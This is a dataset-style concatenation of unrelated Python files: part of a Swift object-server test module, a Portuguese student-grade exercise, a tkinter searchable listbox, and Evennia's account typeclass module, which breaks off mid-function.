        response = self.http_conn.getresponse()
        self.assertEqual(response.status, 201)
        response.read()
        # go goof up the file on disk
        fname = os.path.join(self.testdir, 'sda1', 'objects', '2100',
                             obj_hash[-3:], obj_hash, ts + '.data')
        with open(fname, 'rb+') as fh:
            fh.write('XYZ')
        self.http_conn.request('GET', url_path)
        response = self.http_conn.getresponse()
        self.assertEqual(response.status, 200)
        contents = response.read()
        # first three bytes were overwritten in place above
        self.assertEqual(contents, 'XYZ contents')
        self.http_conn.request('GET', url_path)
        response = self.http_conn.getresponse()
        # it was quarantined by the previous request
        self.assertEqual(response.status, 404)
        response.read()
    def test_quarantine_on_well_formed_zero_byte_file(self):
        # Make sure we work around an oddity in Linux's hash sockets
        url_path = '/sda1/2100/a/c/o'
        ts = '1402700497.71333'
        self.http_conn.request(
            'PUT', url_path, '',
            {'X-Timestamp': ts, 'Content-Length': '0',
             'Content-Type': 'application/test'})
        response = self.http_conn.getresponse()
        self.assertEqual(response.status, 201)
        response.read()
        self.http_conn.request('GET', url_path)
        response = self.http_conn.getresponse()
        self.assertEqual(response.status, 200)
        contents = response.read()
        self.assertEqual(contents, '')
        self.http_conn.request('GET', url_path)
        response = self.http_conn.getresponse()
        self.assertEqual(response.status, 200)  # still there
        contents = response.read()
        self.assertEqual(contents, '')
class TestConfigOptionHandling(unittest.TestCase):
    """Verify how [DEFAULT] vs [app:object-server] config options (e.g.
    reclaim_age) propagate into the per-policy diskfile managers."""
    def setUp(self):
        self.tmpdir = mkdtemp()
    def tearDown(self):
        rmtree(self.tmpdir)
    def _app_config(self, config):
        # write the (dedented) config to disk and load the app from it;
        # returns the first two items of init_request_processor: app, conf
        contents = dedent(config)
        conf_file = os.path.join(self.tmpdir, 'object-server.conf')
        with open(conf_file, 'w') as f:
            f.write(contents)
        return init_request_processor(conf_file, 'object-server')[:2]
    def test_default(self):
        """No option anywhere: built-in default of one week is used."""
        config = """
        [DEFAULT]
        [pipeline:main]
        pipeline = object-server
        [app:object-server]
        use = egg:swift#object
        """
        app, config = self._app_config(config)
        self.assertNotIn('reclaim_age', config)
        for policy in POLICIES:
            self.assertEqual(app._diskfile_router[policy].reclaim_age, 604800)
    def test_option_in_app(self):
        """Option only in the app section is honored."""
        config = """
        [DEFAULT]
        [pipeline:main]
        pipeline = object-server
        [app:object-server]
        use = egg:swift#object
        reclaim_age = 100
        """
        app, config = self._app_config(config)
        self.assertEqual(config['reclaim_age'], '100')
        for policy in POLICIES:
            self.assertEqual(app._diskfile_router[policy].reclaim_age, 100)
    def test_option_in_default(self):
        """Option only in [DEFAULT] is honored."""
        config = """
        [DEFAULT]
        reclaim_age = 200
        [pipeline:main]
        pipeline = object-server
        [app:object-server]
        use = egg:swift#object
        """
        app, config = self._app_config(config)
        self.assertEqual(config['reclaim_age'], '200')
        for policy in POLICIES:
            self.assertEqual(app._diskfile_router[policy].reclaim_age, 200)
    def test_option_in_both(self):
        """[DEFAULT] wins over a plain app-section value; the paste
        "set" syntax is required for the app section to override it."""
        config = """
        [DEFAULT]
        reclaim_age = 300
        [pipeline:main]
        pipeline = object-server
        [app:object-server]
        use = egg:swift#object
        reclaim_age = 400
        """
        app, config = self._app_config(config)
        self.assertEqual(config['reclaim_age'], '300')
        for policy in POLICIES:
            self.assertEqual(app._diskfile_router[policy].reclaim_age, 300)
        # use paste "set" syntax to override global config value
        config = """
        [DEFAULT]
        reclaim_age = 500
        [pipeline:main]
        pipeline = object-server
        [app:object-server]
        use = egg:swift#object
        set reclaim_age = 600
        """
        app, config = self._app_config(config)
        self.assertEqual(config['reclaim_age'], '600')
        for policy in POLICIES:
            self.assertEqual(app._diskfile_router[policy].reclaim_age, 600)
# allow running this test module directly
if __name__ == '__main__':
    unittest.main()
| [
"[email protected]"
] | |
ab4b58c9f57d81b86dab68de0f9e7f748fa7cce3 | 7680dbfce22b31835107403514f1489a8afcf3df | /Exercícios_parte_2/exercício__090.py | ee3ab125b849a111a10a421c0ee9807bb6c49dac | [] | no_license | EstephanoBartenski/Aprendendo_Python | c0022d545af00c14e6778f6a80f666de31a7659e | 69b4c2e07511a0bd91ac19df59aa9dafdf28fda3 | refs/heads/master | 2022-11-27T17:14:00.949163 | 2020-08-03T22:11:19 | 2020-08-03T22:11:19 | 284,564,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,083 | py | # dicionários
print('--' * 17)
print(' CADASTRO DE NOTAS')
print('--' * 17)
aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input('Média de {}: '.format(aluno['nome'])))
print()
print(f' - O nome é {aluno["nome"]}.\n'
f' - A média é {aluno["med"]:.2f}.')
if aluno['med'] >= 7:
print(' - Situação: APROVADO!')
aluno['situação'] = 'aprovado'
elif 5 <= aluno['med'] < 7:
print(' - Situação: RECUPERAÇÃO!')
aluno['situação'] = 'recuperação'
else:
print(' - Situação: REPROVADO!')
aluno['situação'] = 'reprovado'
print()
print(aluno)
# outra resolução:
'''aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input(f'Média de {aluno["nome"]} '))
if aluno['med'] >= 7:
aluno['situação'] = 'Aprovado'
elif 5 <= aluno['med'] < 7:
aluno['situação'] = 'Recuperação'
else:
aluno['situação'] = 'Reprovado'
print('--' * 30)
for k, v in aluno.items():
print(f' - {k} é igual a {v}')''' | [
"[email protected]"
] | |
4345f43ceebfae6bf9b4514241a243202d936d70 | 6d71de4e88dcb7d04f6d3a18736d393e12f8d087 | /scripts/packages/mylistbox.py | 27d62cd97b87fe9edbbcf35263ca9292f8eac3c9 | [
"MIT"
] | permissive | wyolum/Alex | 71075c30691229e8eb28afa06a6ab44c450b14d4 | 03f1d8ae0107454d18964e33777ffc4c0c1a1951 | refs/heads/main | 2023-07-02T16:11:57.088323 | 2021-08-05T17:59:04 | 2021-08-05T17:59:04 | 338,686,528 | 10 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | #https://tk-tutorial.readthedocs.io/en/latest/listbox/listbox.html
import tkinter as tk
def listbox(parent, items, item_clicked, item_selected, n_row=40):
    """Build a Frame containing a search Entry and a Listbox of *items*.

    ``item_clicked(text)`` fires on single click (which also copies the
    clicked text into the entry); ``item_selected(text)`` fires on
    double click.  Returns the Frame, with the listbox's get/insert/
    delete/index methods re-exported as attributes on it.
    """
    def myclick(event=None):
        # copy the clicked item into the search box and notify the caller
        idx = lb.curselection()
        if idx:
            out = lb.get(idx)
            search.delete(0, tk.END)
            search.insert(0, out)
            item_clicked(out)
    def myselect(event):
        # double-click: behaves like a click, then notifies item_selected
        myclick(event)
        idx = lb.curselection()
        out = lb.get(idx)
        item_selected(out)
    def search_changed(*args):
        # filter the listbox to items containing the search string
        # (currently inactive -- the trace hookup below is commented out)
        search_str = search_var.get()
        i = 0
        lb.delete(0, tk.END)
        for item in items:
            if search_str.lower() in item.lower():
                lb.insert(i, item)
                i += 1
    frame = tk.Frame(parent)
    search_var = tk.StringVar()
    #search_var.trace('w', search_changed)
    search = tk.Entry(frame, width=40, textvariable=search_var)
    search.grid(row=1, column=0)
    var = tk.StringVar(value=items)
    lb = tk.Listbox(frame, listvariable=var, selectmode='single', height=n_row, width=40)
    lb.grid(row=2, column=0)
    lb.bind('<<ListboxSelect>>', myclick)
    lb.bind('<Double-Button-1>', myselect)
    # expose the listbox API directly on the returned frame
    frame.get = lb.get
    frame.insert = lb.insert
    frame.delete = lb.delete
    frame.index = lb.index
    return frame
def click(*args):
    # Demo callback for single-click events: echo the arguments.
    print('click', args)
def select(*args):
    # Demo callback for double-click (selection) events: echo the arguments.
    print('select', args)
if __name__ == '__main__':
    # Demo: browse tkinter's attribute names in the searchable listbox.
    root = tk.Tk()
    frame = listbox(root, dir(tk), click, select)
    frame.grid()
    root.mainloop()
| [
"[email protected]"
] | |
7a1b250d70836eea4d41151baba4c99d37dad85c | 5d8cecc379bb828694662c865930be8c75d26943 | /evennia/accounts/accounts.py | 626c4a60f3a83d7b5cfa779d6967e68f0be50d6e | [
"BSD-3-Clause"
] | permissive | job/evennia | 714e0f3699875169ce0987e4ebc6b5340bef8cbd | 5aaa0fcfee6082a3a2259a6562c459c5f21fb591 | refs/heads/master | 2021-05-08T23:56:14.348366 | 2018-01-30T17:22:24 | 2018-01-30T17:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,062 | py | """
Typeclass for Account objects
Note that this object is primarily intended to
store OOC information, not game info! This
object represents the actual user (not their
character) and has NO actual precence in the
game world (this is handled by the associated
character object, so you should customize that
instead for most things).
"""
import time
from django.conf import settings
from django.utils import timezone
from evennia.typeclasses.models import TypeclassBase
from evennia.accounts.manager import AccountManager
from evennia.accounts.models import AccountDB
from evennia.objects.models import ObjectDB
from evennia.comms.models import ChannelDB
from evennia.commands import cmdhandler
from evennia.utils import logger
from evennia.utils.utils import (lazy_property,
make_iter, to_unicode, is_iter,
variable_from_module)
from evennia.typeclasses.attributes import NickHandler
from evennia.scripts.scripthandler import ScriptHandler
from evennia.commands.cmdsethandler import CmdSetHandler
from django.utils.translation import ugettext as _
from future.utils import with_metaclass
__all__ = ("DefaultAccount",)
_SESSIONS = None
_AT_SEARCH_RESULT = variable_from_module(*settings.SEARCH_AT_RESULT.rsplit('.', 1))
_MULTISESSION_MODE = settings.MULTISESSION_MODE
_MAX_NR_CHARACTERS = settings.MAX_NR_CHARACTERS
_CMDSET_ACCOUNT = settings.CMDSET_ACCOUNT
_CONNECT_CHANNEL = None
class AccountSessionHandler(object):
    """
    Manages the session(s) attached to an account.
    """
    def __init__(self, account):
        """
        Initialize the handler.

        Args:
            account (Account): The Account this handler is defined on.
        """
        self.account = account

    def get(self, sessid=None):
        """
        Get the sessions linked to this object.

        Args:
            sessid (int, optional): Limit the result to the session
                with this session id.

        Returns:
            sessions (list): Session objects. When `sessid` is given
                this list holds one (or zero) elements.
        """
        global _SESSIONS
        if not _SESSIONS:
            # lazy-load the global session handler on first use
            from evennia.server.sessionhandler import SESSIONS as _SESSIONS
        if not sessid:
            return _SESSIONS.sessions_from_account(self.account)
        return make_iter(_SESSIONS.session_from_account(self.account, sessid))

    def all(self):
        """
        Alias of get(), returning all sessions.

        Returns:
            sessions (list): All sessions.
        """
        return self.get()

    def count(self):
        """
        Number of connected sessions.

        Returns:
            sesslen (int): Number of sessions handled.
        """
        return len(self.get())
class DefaultAccount(with_metaclass(TypeclassBase, AccountDB)):
"""
This is the base Typeclass for all Accounts. Accounts represent
the person playing the game and tracks account info, password
etc. They are OOC entities without presence in-game. An Account
can connect to a Character Object in order to "enter" the
game.
Account Typeclass API:
* Available properties (only available on initiated typeclass objects)
- key (string) - name of account
- name (string)- wrapper for user.username
- aliases (list of strings) - aliases to the object. Will be saved to
database as AliasDB entries but returned as strings.
- dbref (int, read-only) - unique #id-number. Also "id" can be used.
- date_created (string) - time stamp of object creation
- permissions (list of strings) - list of permission strings
- user (User, read-only) - django User authorization object
- obj (Object) - game object controlled by account. 'character' can also
be used.
- sessions (list of Sessions) - sessions connected to this account
- is_superuser (bool, read-only) - if the connected user is a superuser
* Handlers
- locks - lock-handler: use locks.add() to add new lock strings
- db - attribute-handler: store/retrieve database attributes on this
self.db.myattr=val, val=self.db.myattr
- ndb - non-persistent attribute handler: same as db but does not
create a database entry when storing data
- scripts - script-handler. Add new scripts to object with scripts.add()
- cmdset - cmdset-handler. Use cmdset.add() to add new cmdsets to object
- nicks - nick-handler. New nicks with nicks.add().
* Helper methods
- msg(text=None, from_obj=None, session=None, options=None, **kwargs)
- execute_cmd(raw_string)
- search(ostring, global_search=False, attribute_name=None,
use_nicks=False, location=None,
ignore_errors=False, account=False)
- is_typeclass(typeclass, exact=False)
- swap_typeclass(new_typeclass, clean_attributes=False, no_default=True)
- access(accessing_obj, access_type='read', default=False, no_superuser_bypass=False)
- check_permstring(permstring)
* Hook methods
basetype_setup()
at_account_creation()
> note that the following hooks are also found on Objects and are
usually handled on the character level:
- at_init()
- at_access()
- at_cmdset_get(**kwargs)
- at_first_login()
- at_post_login(session=None)
- at_disconnect()
- at_message_receive()
- at_message_send()
- at_server_reload()
- at_server_shutdown()
"""
objects = AccountManager()
# properties
@lazy_property
def cmdset(self):
return CmdSetHandler(self, True)
@lazy_property
def scripts(self):
return ScriptHandler(self)
@lazy_property
def nicks(self):
return NickHandler(self)
@lazy_property
def sessions(self):
return AccountSessionHandler(self)
# session-related methods
def disconnect_session_from_account(self, session, reason=None):
"""
Access method for disconnecting a given session from the
account (connection happens automatically in the
sessionhandler)
Args:
session (Session): Session to disconnect.
reason (str, optional): Eventual reason for the disconnect.
"""
global _SESSIONS
if not _SESSIONS:
from evennia.server.sessionhandler import SESSIONS as _SESSIONS
_SESSIONS.disconnect(session, reason)
# puppeting operations
def puppet_object(self, session, obj):
"""
Use the given session to control (puppet) the given object (usually
a Character type).
Args:
session (Session): session to use for puppeting
obj (Object): the object to start puppeting
Raises:
RuntimeError: If puppeting is not possible, the
`exception.msg` will contain the reason.
"""
# safety checks
if not obj:
raise RuntimeError("Object not found")
if not session:
raise RuntimeError("Session not found")
if self.get_puppet(session) == obj:
# already puppeting this object
self.msg("You are already puppeting this object.")
return
if not obj.access(self, 'puppet'):
# no access
self.msg("You don't have permission to puppet '%s'." % obj.key)
return
if obj.account:
# object already puppeted
if obj.account == self:
if obj.sessions.count():
# we may take over another of our sessions
# output messages to the affected sessions
if _MULTISESSION_MODE in (1, 3):
txt1 = "Sharing |c%s|n with another of your sessions."
txt2 = "|c%s|n|G is now shared from another of your sessions.|n"
self.msg(txt1 % obj.name, session=session)
self.msg(txt2 % obj.name, session=obj.sessions.all())
else:
txt1 = "Taking over |c%s|n from another of your sessions."
txt2 = "|c%s|n|R is now acted from another of your sessions.|n"
self.msg(txt1 % obj.name, session=session)
self.msg(txt2 % obj.name, session=obj.sessions.all())
self.unpuppet_object(obj.sessions.get())
elif obj.account.is_connected:
# controlled by another account
self.msg("|c%s|R is already puppeted by another Account." % obj.key)
return
# do the puppeting
if session.puppet:
# cleanly unpuppet eventual previous object puppeted by this session
self.unpuppet_object(session)
# if we get to this point the character is ready to puppet or it
# was left with a lingering account/session reference from an unclean
# server kill or similar
obj.at_pre_puppet(self, session=session)
# do the connection
obj.sessions.add(session)
obj.account = self
session.puid = obj.id
session.puppet = obj
# validate/start persistent scripts on object
obj.scripts.validate()
# re-cache locks to make sure superuser bypass is updated
obj.locks.cache_lock_bypass(obj)
# final hook
obj.at_post_puppet()
def unpuppet_object(self, session):
"""
Disengage control over an object.
Args:
session (Session or list): The session or a list of
sessions to disengage from their puppets.
Raises:
RuntimeError With message about error.
"""
for session in make_iter(session):
obj = session.puppet
if obj:
# do the disconnect, but only if we are the last session to puppet
obj.at_pre_unpuppet()
obj.sessions.remove(session)
if not obj.sessions.count():
del obj.account
obj.at_post_unpuppet(self, session=session)
# Just to be sure we're always clear.
session.puppet = None
session.puid = None
    def unpuppet_all(self):
        """
        Disconnect all puppets from all of this account's sessions.
        Called by the server just before a reset/shutdown.
        """
        # unpuppet_object accepts a list of sessions directly
        self.unpuppet_object(self.sessions.all())
    def get_puppet(self, session):
        """
        Get the object puppeted by this session through this account. This is
        the main method for retrieving the puppeted object from the
        account's end.

        Args:
            session (Session): Find puppeted object based on this session.

        Returns:
            puppet (Object or None): The matching puppeted object, if any.
        """
        return session.puppet
def get_all_puppets(self):
"""
Get all currently puppeted objects.
Returns:
puppets (list): All puppeted objects currently controlled
by this Account.
"""
return list(set(session.puppet for session in self.sessions.all() if session.puppet))
def __get_single_puppet(self):
"""
This is a legacy convenience link for use with `MULTISESSION_MODE`.
Returns:
puppets (Object or list): Users of `MULTISESSION_MODE` 0 or 1 will
always get the first puppet back. Users of higher `MULTISESSION_MODE`s will
get a list of all puppeted objects.
"""
puppets = self.get_all_puppets()
if _MULTISESSION_MODE in (0, 1):
return puppets and puppets[0] or None
return puppets
character = property(__get_single_puppet)
puppet = property(__get_single_puppet)
# utility methods
def delete(self, *args, **kwargs):
"""
Deletes the account permanently.
Notes:
`*args` and `**kwargs` are passed on to the base delete
mechanism (these are usually not used).
"""
for session in self.sessions.all():
# unpuppeting all objects and disconnecting the user, if any
# sessions remain (should usually be handled from the
# deleting command)
try:
self.unpuppet_object(session)
except RuntimeError:
# no puppet to disconnect from
pass
session.sessionhandler.disconnect(session, reason=_("Account being deleted."))
self.scripts.stop()
self.attributes.clear()
self.nicks.clear()
self.aliases.clear()
super(DefaultAccount, self).delete(*args, **kwargs)
# methods inherited from database model
def msg(self, text=None, from_obj=None, session=None, options=None, **kwargs):
"""
Evennia -> User
This is the main route for sending data back to the user from the
server.
Args:
text (str, optional): text data to send
from_obj (Object or Account or list, optional): Object sending. If given, its
at_msg_send() hook will be called. If iterable, call on all entities.
session (Session or list, optional): Session object or a list of
Sessions to receive this send. If given, overrules the
default send behavior for the current
MULTISESSION_MODE.
options (list): Protocol-specific options. Passed on to the protocol.
Kwargs:
any (dict): All other keywords are passed on to the protocol.
"""
if from_obj:
# call hook
for obj in make_iter(from_obj):
try:
obj.at_msg_send(text=text, to_obj=self, **kwargs)
except Exception:
# this may not be assigned.
logger.log_trace()
try:
if not self.at_msg_receive(text=text, **kwargs):
# abort message to this account
return
except Exception:
# this may not be assigned.
pass
kwargs["options"] = options
# session relay
sessions = make_iter(session) if session else self.sessions.all()
for session in sessions:
session.data_out(text=text, **kwargs)
def execute_cmd(self, raw_string, session=None, **kwargs):
"""
Do something as this account. This method is never called normally,
but only when the account object itself is supposed to execute the
command. It takes account nicks into account, but not nicks of
eventual puppets.
Args:
raw_string (str): Raw command input coming from the command line.
session (Session, optional): The session to be responsible
for the command-send
Kwargs:
kwargs (any): Other keyword arguments will be added to the
found command object instance as variables before it
executes. This is unused by default Evennia but may be
used to set flags and change operating paramaters for
commands at run-time.
"""
raw_string = to_unicode(raw_string)
raw_string = self.nicks.nickreplace(raw_string, categories=("inputline", "channel"), include_account=False)
if not session and _MULTISESSION_MODE in (0, 1):
# for these modes we use the first/only session
sessions = self.sessions.get()
session = sessions[0] if sessions else None
return cmdhandler.cmdhandler(self, raw_string,
callertype="account", session=session, **kwargs)
def search(self, searchdata, return_puppet=False, search_object=False,
typeclass=None, nofound_string=None, multimatch_string=None, use_nicks=True, **kwargs):
"""
This is similar to `DefaultObject.search` but defaults to searching
for Accounts only.
Args:
searchdata (str or int): Search criterion, the Account's
key or dbref to search for.
return_puppet (bool, optional): Instructs the method to
return matches as the object the Account controls rather
than the Account itself (or None) if nothing is puppeted).
search_object (bool, optional): Search for Objects instead of
Accounts. This is used by e.g. the @examine command when
wanting to examine Objects while OOC.
typeclass (Account typeclass, optional): Limit the search
only to this particular typeclass. This can be used to
limit to specific account typeclasses or to limit the search
to a particular Object typeclass if `search_object` is True.
nofound_string (str, optional): A one-time error message
to echo if `searchdata` leads to no matches. If not given,
will fall back to the default handler.
multimatch_string (str, optional): A one-time error
message to echo if `searchdata` leads to multiple matches.
If not given, will fall back to the default handler.
use_nicks (bool, optional): Use account-level nick replacement.
Return:
match (Account, Object or None): A single Account or Object match.
Notes:
Extra keywords are ignored, but are allowed in call in
order to make API more consistent with
objects.objects.DefaultObject.search.
"""
# handle me, self and *me, *self
if isinstance(searchdata, basestring):
# handle wrapping of common terms
if searchdata.lower() in ("me", "*me", "self", "*self",):
return self
if search_object:
matches = ObjectDB.objects.object_search(searchdata, typeclass=typeclass, use_nicks=use_nicks)
else:
searchdata = self.nicks.nickreplace(searchdata, categories=("account", ), include_account=False)
matches = AccountDB.objects.account_search(searchdata, typeclass=typeclass)
matches = _AT_SEARCH_RESULT(matches, self, query=searchdata,
nofound_string=nofound_string,
multimatch_string=multimatch_string)
if matches and return_puppet:
try:
return matches.puppet
except AttributeError:
return None
return matches
def access(self, accessing_obj, access_type='read', default=False, no_superuser_bypass=False, **kwargs):
"""
Determines if another object has permission to access this
object in whatever way.
Args:
accessing_obj (Object): Object trying to access this one.
access_type (str, optional): Type of access sought.
default (bool, optional): What to return if no lock of
access_type was found
no_superuser_bypass (bool, optional): Turn off superuser
lock bypassing. Be careful with this one.
Kwargs:
kwargs (any): Passed to the at_access hook along with the result.
Returns:
result (bool): Result of access check.
"""
result = super(DefaultAccount, self).access(accessing_obj, access_type=access_type,
default=default, no_superuser_bypass=no_superuser_bypass)
self.at_access(result, accessing_obj, access_type, **kwargs)
return result
@property
def idle_time(self):
"""
Returns the idle time of the least idle session in seconds. If
no sessions are connected it returns nothing.
"""
idle = [session.cmd_last_visible for session in self.sessions.all()]
if idle:
return time.time() - float(max(idle))
return None
@property
def connection_time(self):
"""
Returns the maximum connection time of all connected sessions
in seconds. Returns nothing if there are no sessions.
"""
conn = [session.conn_time for session in self.sessions.all()]
if conn:
return time.time() - float(min(conn))
return None
# account hooks
def basetype_setup(self):
"""
This sets up the basic properties for an account. Overload this
with at_account_creation rather than changing this method.
"""
# A basic security setup
lockstring = "examine:perm(Admin);edit:perm(Admin);" \
"delete:perm(Admin);boot:perm(Admin);msg:all();" \
"noidletimeout:perm(Builder) or perm(noidletimeout)"
self.locks.add(lockstring)
# The ooc account cmdset
self.cmdset.add_default(_CMDSET_ACCOUNT, permanent=True)
def at_account_creation(self):
"""
This is called once, the very first time the account is created
(i.e. first time they register with the game). It's a good
place to store attributes all accounts should have, like
configuration values etc.
"""
# set an (empty) attribute holding the characters this account has
lockstring = "attrread:perm(Admins);attredit:perm(Admins);" \
"attrcreate:perm(Admins);"
self.attributes.add("_playable_characters", [], lockstring=lockstring)
self.attributes.add("_saved_protocol_flags", {}, lockstring=lockstring)
def at_init(self):
"""
This is always called whenever this object is initiated --
that is, whenever it its typeclass is cached from memory. This
happens on-demand first time the object is used or activated
in some way after being created but also after each server
restart or reload. In the case of account objects, this usually
happens the moment the account logs in or reconnects after a
reload.
"""
pass
# Note that the hooks below also exist in the character object's
# typeclass. You can often ignore these and rely on the character
# ones instead, unless you are implementing a multi-character game
# and have some things that should be done regardless of which
# character is currently connected to this account.
def at_first_save(self):
"""
This is a generic hook called by Evennia when this object is
saved to the database the very first time. You generally
don't override this method but the hooks called by it.
"""
self.basetype_setup()
self.at_account_creation()
permissions = settings.PERMISSION_ACCOUNT_DEFAULT
if hasattr(self, "_createdict"):
# this will only be set if the utils.create_account
# function was used to create the object.
cdict = self._createdict
if cdict.get("locks"):
self.locks.add(cdict["locks"])
if cdict.get("permissions"):
permissions = cdict["permissions"]
del self._createdict
self.permissions.batch_add(*permissions)
def at_access(self, result, accessing_obj, access_type, **kwargs):
"""
This is triggered after an access-call on this Account has
completed.
Args:
result (bool): The result of the access check.
accessing_obj (any): The object requesting the access
check.
access_type (str): The type of access checked.
Kwargs:
kwargs (any): These are passed on from the access check
and can be used to relay custom instructions from the
check mechanism.
Notes:
This method cannot affect the result of the lock check and
its return value is not used in any way. It can be used
e.g. to customize error messages in a central location or
create other effects based on the access result.
"""
pass
def at_cmdset_get(self, **kwargs):
"""
Called just *before* cmdsets on this account are requested by
the command handler. The cmdsets are available as
`self.cmdset`. If changes need to be done on the fly to the
cmdset before passing them on to the cmdhandler, this is the
place to do it. This is called also if the account currently
have no cmdsets. kwargs are usually not used unless the
cmdset is generated dynamically.
"""
pass
def at_first_login(self, **kwargs):
"""
Called the very first time this account logs into the game.
Note that this is called *before* at_pre_login, so no session
is established and usually no character is yet assigned at
this point. This hook is intended for account-specific setup
like configurations.
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_pre_login(self, **kwargs):
"""
Called every time the user logs in, just before the actual
login-state is set.
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def _send_to_connect_channel(self, message):
"""
Helper method for loading and sending to the comm channel
dedicated to connection messages.
Args:
message (str): A message to send to the connect channel.
"""
global _CONNECT_CHANNEL
if not _CONNECT_CHANNEL:
try:
_CONNECT_CHANNEL = ChannelDB.objects.filter(db_key=settings.DEFAULT_CHANNELS[1]["key"])[0]
except Exception:
logger.log_trace()
now = timezone.now()
now = "%02i-%02i-%02i(%02i:%02i)" % (now.year, now.month,
now.day, now.hour, now.minute)
if _CONNECT_CHANNEL:
_CONNECT_CHANNEL.tempmsg("[%s, %s]: %s" % (_CONNECT_CHANNEL.key, now, message))
else:
logger.log_info("[%s]: %s" % (now, message))
def at_post_login(self, session=None, **kwargs):
"""
Called at the end of the login process, just before letting
the account loose.
Args:
session (Session, optional): Session logging in, if any.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
Notes:
This is called *before* an eventual Character's
`at_post_login` hook. By default it is used to set up
auto-puppeting based on `MULTISESSION_MODE`.
"""
# if we have saved protocol flags on ourselves, load them here.
protocol_flags = self.attributes.get("_saved_protocol_flags", None)
if session and protocol_flags:
session.update_flags(**protocol_flags)
# inform the client that we logged in through an OOB message
if session:
session.msg(logged_in={})
self._send_to_connect_channel("|G%s connected|n" % self.key)
if _MULTISESSION_MODE == 0:
# in this mode we should have only one character available. We
# try to auto-connect to our last conneted object, if any
try:
self.puppet_object(session, self.db._last_puppet)
except RuntimeError:
self.msg("The Character does not exist.")
return
elif _MULTISESSION_MODE == 1:
# in this mode all sessions connect to the same puppet.
try:
self.puppet_object(session, self.db._last_puppet)
except RuntimeError:
self.msg("The Character does not exist.")
return
elif _MULTISESSION_MODE in (2, 3):
# In this mode we by default end up at a character selection
# screen. We execute look on the account.
# we make sure to clean up the _playable_characers list in case
# any was deleted in the interim.
self.db._playable_characters = [char for char in self.db._playable_characters if char]
self.msg(self.at_look(target=self.db._playable_characters,
session=session))
def at_failed_login(self, session, **kwargs):
"""
Called by the login process if a user account is targeted correctly
but provided with an invalid password. By default it does nothing,
but exists to be overriden.
Args:
session (session): Session logging in.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_disconnect(self, reason=None, **kwargs):
"""
Called just before user is disconnected.
Args:
reason (str, optional): The reason given for the disconnect,
(echoed to the connection channel by default).
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
reason = " (%s)" % reason if reason else ""
self._send_to_connect_channel("|R%s disconnected%s|n" % (self.key, reason))
def at_post_disconnect(self, **kwargs):
"""
This is called *after* disconnection is complete. No messages
can be relayed to the account from here. After this call, the
account should not be accessed any more, making this a good
spot for deleting it (in the case of a guest account account,
for example).
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_msg_receive(self, text=None, from_obj=None, **kwargs):
"""
This hook is called whenever someone sends a message to this
object using the `msg` method.
Note that from_obj may be None if the sender did not include
itself as an argument to the obj.msg() call - so you have to
check for this. .
Consider this a pre-processing method before msg is passed on
to the user session. If this method returns False, the msg
will not be passed on.
Args:
text (str, optional): The message received.
from_obj (any, optional): The object sending the message.
Kwargs:
This includes any keywords sent to the `msg` method.
Returns:
receive (bool): If this message should be received.
Notes:
If this method returns False, the `msg` operation
will abort without sending the message.
"""
return True
def at_msg_send(self, text=None, to_obj=None, **kwargs):
"""
This is a hook that is called when *this* object sends a
message to another object with `obj.msg(text, to_obj=obj)`.
Args:
text (str, optional): Text to send.
to_obj (any, optional): The object to send to.
Kwargs:
Keywords passed from msg()
Notes:
Since this method is executed by `from_obj`, if no `from_obj`
was passed to `DefaultCharacter.msg` this hook will never
get called.
"""
pass
def at_server_reload(self):
"""
This hook is called whenever the server is shutting down for
restart/reboot. If you want to, for example, save
non-persistent properties across a restart, this is the place
to do it.
"""
pass
def at_server_shutdown(self):
"""
This hook is called whenever the server is shutting down fully
(i.e. not for a restart).
"""
pass
def at_look(self, target=None, session=None, **kwargs):
"""
Called when this object executes a look. It allows to customize
just what this means.
Args:
target (Object or list, optional): An object or a list
objects to inspect.
session (Session, optional): The session doing this look.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
Returns:
look_string (str): A prepared look string, ready to send
off to any recipient (usually to ourselves)
"""
if target and not is_iter(target):
# single target - just show it
return target.return_appearance(self)
else:
# list of targets - make list to disconnect from db
characters = list(tar for tar in target if tar) if target else []
sessions = self.sessions.all()
is_su = self.is_superuser
# text shown when looking in the ooc area
result = ["Account |g%s|n (you are Out-of-Character)" % self.key]
nsess = len(sessions)
result.append(nsess == 1 and "\n\n|wConnected session:|n" or "\n\n|wConnected sessions (%i):|n" % nsess)
for isess, sess in enumerate(sessions):
csessid = sess.sessid
addr = "%s (%s)" % (sess.protocol_key, isinstance(sess.address, tuple) and
str(sess.address[0]) or str(sess.address))
result.append("\n %s %s" % (session.sessid == csessid and "|w* %s|n" % (isess + 1) or
" %s" % (isess + 1), addr))
result.append("\n\n |whelp|n - more commands")
result.append("\n |wooc <Text>|n - talk on public channel")
charmax = _MAX_NR_CHARACTERS if _MULTISESSION_MODE > 1 else 1
if is_su or len(characters) < charmax:
if not characters:
result.append("\n\n You don't have any characters yet. See |whelp @charcreate|n for creating one.")
else:
result.append("\n |w@charcreate <name> [=description]|n - create new character")
result.append("\n |w@chardelete <name>|n - delete a character (cannot be undone!)")
if characters:
string_s_ending = len(characters) > 1 and "s" or ""
result.append("\n |w@ic <character>|n - enter the game (|w@ooc|n to get back here)")
if is_su:
result.append("\n\nAvailable character%s (%i/unlimited):" % (string_s_ending, len(characters)))
else:
result.append("\n\nAvailable character%s%s:"
% (string_s_ending, charmax > 1 and " (%i/%i)" % (len(characters), charmax) or ""))
for char in characters:
csessions = char.sessions.all()
if csessions:
for sess in csessions:
# character is already puppeted
sid = sess in sessions and sessions.index(sess) + 1
if sess and sid:
result.append("\n - |G%s|n [%s] (played by you in session %i)"
% (char.key, ", ".join(char.permissions.all()), sid))
else:
result.append("\n - |R%s|n [%s] (played by someone else)"
